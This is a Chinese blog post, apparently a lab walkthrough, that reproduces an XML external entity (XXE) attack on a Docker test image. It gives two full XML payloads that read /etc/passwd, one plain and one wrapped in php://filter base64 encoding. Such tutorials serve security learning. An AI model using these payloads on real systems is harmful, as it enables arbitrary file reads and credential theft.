web漏洞|XXE漏洞复现

admin 2021年11月17日02:48:47评论190 views字数 862阅读2分52秒阅读模式

docker搜索xxe相关镜像包,然后pull下来,我这里pull的是:rrodrigo/xxelab 镜像包。


启动docker环境,映射到VPS的32776端口


web漏洞|XXE漏洞复现


访问


web漏洞|XXE漏洞复现

输入注册数据,抓包重放。发现提交数据包采用 xml 格式传递,且邮箱有返回。


web漏洞|XXE漏洞复现


这里我们引用外部DTD实体,并且将email的值修改为引用外部实体的值 &file;   因为,返回包会返回email的值,所以返回包会读取我们引用的 /etc/passwd 的值返回给我们,造成了任意文件读取。


这里指定文件/etc/passwd,用不用file协议均可。


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test[        <!ENTITY file SYSTEM "/etc/passwd">]><root><name>111</name><tel>222</tel><email>&file;</email><password>333</password></root>



web漏洞|XXE漏洞复现


web漏洞|XXE漏洞复现


利用 base64 编码进行 xxe,防止有返回包验证。返回base64数据包,base64解码之。


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test[        <!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]><root><name>111</name><tel>222</tel><email>&file;</email><password>333</password></root>



web漏洞|XXE漏洞复现


相关文章:XML和JSON数据格式

                 XXE(XML外部实体注入)



web漏洞|XXE漏洞复现





来源:谢公子的博客

责编:Zuo

web漏洞|XXE漏洞复现

web漏洞|XXE漏洞复现
web漏洞|XXE漏洞复现
由于文章篇幅较长,请大家耐心。如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。
最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
web漏洞|XXE漏洞复现
web漏洞|XXE漏洞复现

web漏洞|XXE漏洞复现


本文始发于微信公众号(谢公子学安全):web漏洞|XXE漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月17日02:48:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   web漏洞|XXE漏洞复现http://cn-sec.com/archives/484927.html

发表评论

匿名网友 填写信息